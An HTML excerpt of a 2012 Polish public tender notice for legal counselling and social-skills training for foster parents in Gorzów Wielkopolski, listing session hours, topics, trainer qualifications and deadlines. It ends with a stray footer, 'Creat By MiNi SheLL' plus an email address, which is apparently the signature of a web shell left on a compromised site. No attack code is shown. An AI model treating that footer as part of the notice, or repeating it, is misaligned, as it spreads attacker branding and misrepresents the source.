<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja stacjonarnego poradnictwa specjalistycznego, służąca przywróceniu samodzielności życiowej oraz wzmocnieniu wiary we własne możliwości wychowawcze dla rodziców zastępczych, osób prowadzących rodzinne domy dziecka lub osób z problemami opiekuńczo-wychowawczymi: (12 osób) organizacja grupowego stacjonarnego poradnictwa specjalistycznego mającego na celu podniesienie świadomości prawnej oraz wzmocnienie wiary we własne możliwości wychowawcze i ukierunkowanie rodzica w radzeniu sobie z przeszkodami natury formalnej (m.in. pozyskiwanie dokumentacji medycznej, sądowej, z urzędu stanu cywilnego, ośrodka pomocy społecznej, powiatowego centrum pomocy rodzinie), warsztaty praktyczne w oparciu o inne konkretne potrzeby, zgłoszone w trakcie zajęć. Wykonawca zapewni przeprowadzenie dwóch spotkań trwających po 3 godziny zegarowe z co najmniej jedną 15 minutową przerwą. Łączna ilość godzin: 6 godzin zegarowych.
Zakres przedmiotowy powinien zapewnić omówienie materiału z zakresu:
- podnoszenia świadomości prawnej i ukierunkowania rodzica (w tym rodzica zastępczego) w radzeniu sobie z przeszkodami natury formalnej (m.in. pozyskiwanie dokumentacji medycznej, sądowej, z urzędu stanu cywilnego, ośrodka pomocy społecznej, powiatowego centrum pomocy rodzinie), 
- opieki prawnej,
- prawa rodziny zastępczej w świetle Kodeksu Rodzinnego i Opiekuńczego,
- obowiązki rodziny zastępczej (występowanie o alimenty, pozbawienie władzy rodzicielskiej)
Ponadto zakres przedmiotowy powinien zapewnić przeprowadzenie warsztatów praktycznych w oparciu o inne konkretne potrzeby, zgłoszone w trakcie zajęć.
Wykonawca zobowiązuje się do przeprowadzenia zaplanowanej usługi przez prawnika lub radcę prawnego specjalizującego się w prawie rodzinnym.Zajęcia muszą odbywać się na terenie miasta Gorzowa Wlkp. Szkolenie musi być prowadzone w sali szkoleniowej, przystosowanej do prowadzenia kursów. Każdy uczestnik powinien mieć zapewniony stolik z krzesłem, w sali powinna znajdować się tablica. Wykonawca zapewnia także zabezpieczenie niezbędnego sprzętu multimedialnego np. telewizora DVD, magnetofonu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Trening kompetencji i umiejętności społecznych poprzez integrację ze środowiskiem rodzicielstwa zastępczego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trening kompetencji i umiejętności społecznych poprzez integrację ze środowiskiem rodzicielstwa zastępczego dla rodziców zastępczych, osób prowadzących rodzinne domy dziecka lub osób z problemami opiekuńczo-wychowawczymi: (12 osób) organizacja treningu kompetencji i umiejętności społecznych poprzez integrację ze środowiskiem rodzicielstwa zastępczego.
W czasie spotkań muszą odbyć się zajęcia wspierające proces mający na celu pomoc w ustaleniu przyczyn trudnych zachowań dzieci przyjętych oraz ukazanie sposobów radzenia sobie z tymi zachowaniami; zapoznanie uczestników z różnymi metodami rozwiązywania konfliktów, umożliwienie zintegrowania środowiska rodzin zastępczych, planowania ścieżki życiowej wychowanków, przygotowanie wychowanków do samodzielności. 
Muszą one zawierać nie mniej niż 3 spotkania każde z nich trwające 2 godziny zegarowe. Spotkania muszą odbywać się w weekendy tj. sobota - niedziela (z wyłączeniem dni ustawowo świątecznych). Łączna ilość godzin treningu kompetencji musi wynosić nie mniej niż 6. Spotkania muszą być prowadzone przez jednego specjalistę. 
Zakres przedmiotowy powinien zapewnić omówienie materiału z zakresu:
- organizacji zajęć mających na celu pomoc w ustaleniu przyczyn trudnych zachowań dzieci przyjętych do rodziny zastępczej oraz ukazanie sposobów radzenia sobie z tymi zachowaniami 
- zapoznania uczestników z różnymi metodami rozwiązywania konfliktów, w tym konfliktów w relacjach wychowanek - rodzic zastępczy-rodzic biologiczny
- wyzwań wychowawczych związanych z dorastaniem,
- dojrzałości do rozstania jako etapu rozwojowego,
- założenia funkcjonowania grupy wsparcia rodzin zastępczych - dlaczego tworzy się grupy wsparcia,  podstawy ich funkcjonowania.
Wykonawca zobowiązuje się do przeprowadzenia zaplanowanej usługi przez co najmniej następujących specjalistów: 
a) pedagoga, posiadającego minimum dwuletnie doświadczenie zawodowe i
b) psychologa, posiadającego minimum dwuletnie doświadczenie w zawodowe
Zajęcia muszą odbywać się na terenie miasta Gorzowa Wlkp. Szkolenie musi być prowadzone w sali szkoleniowej, przystosowanej do prowadzenia kursów. Każdy uczestnik powinien mieć zapewniony stolik z krzesłem, w sali powinna znajdować się tablica. Wykonawca zapewnia także zabezpieczenie niezbędnego sprzętu multimedialnego np. telewizora DVD, magnetofonu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com